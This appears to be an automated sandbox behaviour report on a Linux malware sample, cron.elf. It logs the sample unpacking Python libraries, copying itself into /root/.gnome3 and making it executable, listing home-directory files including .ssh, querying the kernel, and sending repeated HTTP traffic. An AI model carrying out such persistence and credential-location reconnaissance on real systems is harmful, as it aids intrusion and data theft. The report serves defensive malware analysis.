Source: /tmp/cron.elf (PID: 6242)	Directory: /root/.gnome3			Jump to behavior
Source: /usr/bin/find (PID: 6370)	Directory: /root/.			Jump to behavior
Source: /usr/bin/find (PID: 6370)	Directory: /root/.			Jump to behavior
Source: /usr/bin/find (PID: 6370)	Directory: /root/.cache			Jump to behavior
Source: /usr/bin/find (PID: 6370)	Directory: /root/.ssh			Jump to behavior
Source: /usr/bin/find (PID: 6370)	Directory: /root/.config			Jump to behavior
Source: /usr/bin/find (PID: 6370)	Directory: /root/.local			Jump to behavior

Source: /tmp/cron.elf (PID: 6245)	Shell command executed: sh -c "uname -p 2> /dev/null"			Jump to behavior
Source: /tmp/cron.elf (PID: 6369)	Shell command executed: sh -c "cd; find . -type f > /tmp/list.txt"			Jump to behavior
Source: /tmp/cron.elf (PID: 6372)	Shell command executed: sh -c "chmod +x /root/.gnome3/cron.elf"			Jump to behavior

Source: /bin/sh (PID: 6373)

Chmod executable: /usr/bin/chmod -> chmod +x /root/.gnome3/cron.elf

Jump to behavior

Source: /usr/bin/dash (PID: 6218)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.daq1fugtlt /tmp/tmp.DKxxUtkXhW /tmp/tmp.wWDD2OqcVY			Jump to behavior
Source: /usr/bin/dash (PID: 6219)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.daq1fugtlt /tmp/tmp.DKxxUtkXhW /tmp/tmp.wWDD2OqcVY			Jump to behavior

Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_cffi_backend.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_codecs_cn.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_codecs_hk.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_codecs_iso2022.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_codecs_jp.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_codecs_kr.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_codecs_tw.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_ctypes.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_hashlib.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_json.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_multibytecodec.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/_ssl.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/bz2.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/cryptography.hazmat.bindings._constant_time.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/cryptography.hazmat.bindings._openssl.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libbz2.so.1.0 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libcrypto.so.1.1 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libexpat.so.1 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libffi.so.6 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libpython2.7.so.1.0 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libreadline.so.7 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libssl.so.1.1 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libtinfo.so.5 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/libz.so.1 (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/pyexpat.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/readline.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/resource.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/termios.so (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/certifi/cacert.pem (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/certifi/old_root.pem (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/certifi/weak.pem (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/PKG-INFO (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/dependency_links.txt (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/not-zip-safe (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/requires.txt (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /tmp/cron.elf (PID: 6217)	File: /tmp/_MEIcXSYvg/cryptography-2.1.4-py2.7.egg-info/top_level.txt (bits: - usr: - grp: - all: rwx)			Jump to behavior
Source: /usr/bin/chmod (PID: 6373)	File: /root/.gnome3/cron.elf (bits: - usr: rx grp: rx all: rwx)			Jump to behavior

Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_cffi_backend.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_codecs_cn.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_codecs_hk.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_codecs_iso2022.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_codecs_jp.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_codecs_kr.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_codecs_tw.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_ctypes.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_hashlib.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_json.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_multibytecodec.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/_ssl.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/bz2.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/cryptography.hazmat.bindings._constant_time.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/cryptography.hazmat.bindings._openssl.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libbz2.so.1.0			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libcrypto.so.1.1			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libexpat.so.1			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libffi.so.6			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libpython2.7.so.1.0			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libreadline.so.7			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libssl.so.1.1			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libtinfo.so.5			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/libz.so.1			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/pyexpat.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/readline.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/resource.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6217)	File written: /tmp/_MEIcXSYvg/termios.so			Jump to dropped file
Source: /tmp/cron.elf (PID: 6242)	File written: /root/.gnome3/cron.elf			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: unknown	Network traffic detected: HTTP traffic on port 54556 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54558 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54560 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54562 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54564 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54566 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54568 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54570 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54572 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54574 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54576 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54578 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54580 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54582 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54584 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54586 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54588 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54590 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54592 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54594 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54596 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54598 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54600 -> 15124
Source: unknown	Network traffic detected: HTTP traffic on port 54602 -> 15124

Source: _codecs_cn.so.12.dr

Dropped file: segment LOAD with 7.4298 entropy (max. 8.0)

Malware Analysis System Evasion

Source: /tmp/cron.elf (PID: 6242)	Queries kernel information via 'uname':			Jump to behavior
Source: /sbin/ldconfig.real (PID: 6244)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uname (PID: 6246)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/find (PID: 6370)	Queries kernel information via 'uname':			Jump to behavior

Source: cacert.pem.12.dr

Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd

Stealing of Sensitive Information

Source: /bin/sh (PID: 6246)

Uname executable: /usr/bin/uname -> uname -p

Jump to behavior